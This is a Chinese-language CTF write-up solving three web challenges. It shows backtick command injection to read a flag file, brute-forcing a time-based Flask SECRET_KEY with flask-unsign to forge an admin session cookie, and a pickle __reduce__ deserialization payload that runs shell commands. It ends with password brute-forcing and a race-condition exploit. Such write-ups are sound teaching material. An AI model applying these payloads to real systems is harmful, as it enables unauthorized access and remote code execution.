1.What the cow say?

测试发现可以反引号命令执行

`ls /f*`

`tac /f*/f*`

2.myflask

import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'
 
if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")

先是/flag路由，需要爆破SECRET_KEY，然后修改 session['username'] = 'admin'

SECRET_KEY由当前时间戳生成，先看一下当前时间戳，便于缩小爆破范围

130053

可以用120000到130000范围爆破

爆破用到flask-unsign包

pip install flask_unsign

bp抓包到当前cookie为eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZdbS5g.lYsm6XdgCg5ieiwMujnnM_sNMxs

爆破脚本

import itertools
import flask_unsign
import requests as r
import time

def generate_wordlist():
    # permutations with repetition
    for x in itertools.product('0123456789', repeat=4):
        yield '12' + "".join(x)
path = "wordlist.txt"
print("Generating wordlist... ")
with open(path, "w") as f:
    for word in generate_wordlist():
        f.write(word + "\n")
cookie_tamper = 'eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZdbS5g.lYsm6XdgCg5ieiwMujnnM_sNMxs'
obj = flask_unsign.Cracker(value=cookie_tamper)
obj.crack(generate_wordlist())
secret = ""
if obj.secret:
    secret = obj.secret 
    print(f"SECRET_KEY ：{secret} ")

爆破出来SECRET_KEY是125121

然后伪造一下cookie,先看一下之前session什么格式

就是{'username': 'guest'}

改成{'username': 'admin'}

eyJ1c2VybmFtZSI6ImFkbWluIn0.ZdbgCQ.krF0aOgj2IOu0hsbvSqoXBtOTlk

成功伪造成admin

第二步是pickle反序列化RCE

脚本

import pickle
import base64
 
class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat /flag').read()",))
    
a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))

3.Select More Courses

显示用字典爆破密码登录

密码是qwert123

扩展学分才能选课

点击扩学分提示和时间竞速，那么不断同时发两个包，一个扩学分，一个选课

会发现选课成功拿到flag

还有两题不会